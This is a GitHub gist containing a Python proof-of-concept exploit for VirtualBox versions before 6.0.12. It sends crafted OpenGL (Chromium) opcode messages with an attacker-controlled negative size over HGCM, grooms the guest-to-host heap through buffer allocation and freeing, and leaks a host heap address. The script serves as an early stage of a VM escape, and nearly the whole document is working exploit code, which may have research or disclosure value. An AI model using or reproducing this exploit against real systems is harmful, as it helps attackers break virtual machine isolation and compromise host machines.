Last active
October 18, 2019 19:24
-
-
Save peternguyen93/73a9558386935696086823b66a17d026 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author : peternguyen93 | |
| import sys | |
| sys.path.append('../') # back to vboxlib module | |
| from vboxlib.hgcm import * | |
| from vboxlib.chromium import * | |
| from ctypes import * | |
| ''' | |
| Affect VirtualBox version < 6.0.12 | |
| ./VirtualBox/src/VBox/GuestHost/OpenGL/include/cr_unpack.h | |
| --------------------------------------------------------------------- | |
| #define INCR_DATA_PTR( delta ) \ | |
| cr_unpackData += (delta) | |
| #define INCR_VAR_PTR() \ | |
| INCR_DATA_PTR( *((int *) cr_unpackData ) ) | |
| --------------------------------------------------------------------- | |
| ''' | |
| op2 = b'' | |
| op2+= pack('<I', 0x28) # size opcode (we control) | |
| op2+= pack('<I',CR_GETUNIFORMLOCATION_EXTEND_OPCODE) | |
| op2+= pack('<I', 0x1000) # size (n) | |
| op2+= b'A'*4 # padding | |
| # op1 = pack('<B', CR_EXTEND_OPCODE) | |
| op1 = b'' | |
| op1+= pack('<I', c_uint32(-0x2050).value) # size opcode (we control) | |
| op1+= pack('<I', CR_GETATTRIBSLOCATIONS_EXTEND_OPCODE) | |
| op1+= pack('<II', 48, 64) | |
| op1+= b'A'*0x20 | |
| msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header | |
| msg+= pack('<I', 2) # number of opcode | |
| msg+= b'\x00'*2 # padding | |
| msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) | |
| msg+= op1 | |
| msg = msg.ljust(4096, b'X') | |
| tmp_msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header | |
| tmp_msg+= pack('<I', 1) # number of opcode | |
| tmp_msg+= b'\x00'*2 # padding | |
| tmp_msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) | |
| tmp_msg+= op1 | |
| tmp_msg+= op2*((4096 - len(tmp_msg)) // len(op2)) | |
| tmp_msg = tmp_msg.ljust(4096, b'P') | |
| client = hgcm_connect('VBoxSharedCrOpenGL') | |
| set_version(client) | |
| client1 = hgcm_connect('VBoxSharedCrOpenGL') | |
| set_version(client1) | |
| buf1 = alloc_buf(client, 0x1000, tmp_msg) | |
| buf2 = alloc_buf(client, 0x1000, tmp_msg) # free this | |
| buf3 = alloc_buf(client, 0x1000, tmp_msg) # free this | |
| buf4 = alloc_buf(client, 0x1000, tmp_msg) # msg extend goes here | |
| print('free buf4') | |
| msg_dispatch(client, buf4) # free buf4 | |
| print('alloc buf4') | |
| buf5 = alloc_buf(client1, 0x1000, msg) # locale in the last of heap | |
| print('free buf3') | |
| msg_dispatch(client, buf3) | |
| print('free buf2') | |
| msg_dispatch(client, buf2) | |
| print('execute buf5') | |
| res = msg_dispatch(client1, buf5) | |
| print(repr(res)[:64]) | |
| heap_address = unpack('<Q', res[8:16])[0] | |
| print('heap:', hex(heap_address)) | |
| hgcm_disconnect(client) | |
| hgcm_disconnect(client1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment